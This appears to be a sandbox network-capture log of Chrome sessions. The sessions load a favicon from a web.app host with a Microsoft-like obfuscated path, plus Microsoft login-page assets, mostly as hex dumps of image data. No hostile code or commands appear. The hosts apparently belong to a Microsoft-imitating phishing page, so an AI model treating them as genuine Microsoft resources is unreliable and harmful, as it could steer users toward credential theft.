2024-04-16 23:37:42 UTC	642	OUT	GET /d..p/others/mi..cro---t/favicon.ico HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:42 UTC	595	IN	HTTP/1.1 200 OK Connection: close Content-Length: 17174 Cache-Control: max-age=3600 Content-Type: image/x-icon Etag: "928026765089cd2a4183510ed4f8be0259cd85b776338ee2c337cacc18bdf016" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Tue, 16 Apr 2024 23:37:42 GMT X-Served-By: cache-pdk-kpdk1780045-PDK X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1713310662.393476,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 Data Ascii: """""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: 3333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 3333333333333333333
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 Data Ascii: DDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDD
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 Data Ascii: UUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUU
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 Data Ascii: DDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 Data Ascii:
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 Data Ascii: """""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 Data Ascii: UDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49728	13.107.213.41	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:42 UTC	417	OUT	GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:42 UTC	805	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 23:37:42 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT ETag: 0x8D7B0071D86E386 x-ms-request-id: b1c5804b-e01e-0044-7b50-909a87000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T233742Z-18655757dbcpl7mrczeqrk2knc000000049000000000ggkc x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-16 23:37:42 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49729	104.123.200.136	443

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:42 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-16 23:37:42 UTC	531	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=113086 Date: Tue, 16 Apr 2024 23:37:42 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-16 23:37:42 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49730	199.36.158.100	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:42 UTC	379	OUT	GET /d..p/others/mi..cro---t/favicon.ico HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:42 UTC	595	IN	HTTP/1.1 200 OK Connection: close Content-Length: 17174 Cache-Control: max-age=3600 Content-Type: image/x-icon Etag: "928026765089cd2a4183510ed4f8be0259cd85b776338ee2c337cacc18bdf016" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Tue, 16 Apr 2024 23:37:42 GMT X-Served-By: cache-pdk-kfty2130045-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1713310663.840815,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 Data Ascii: """""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: 3333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 3333333333333333333
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 Data Ascii: DDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDD
2024-04-16 23:37:42 UTC	1378	IN	Data Raw: 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 Data Ascii: UUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUU
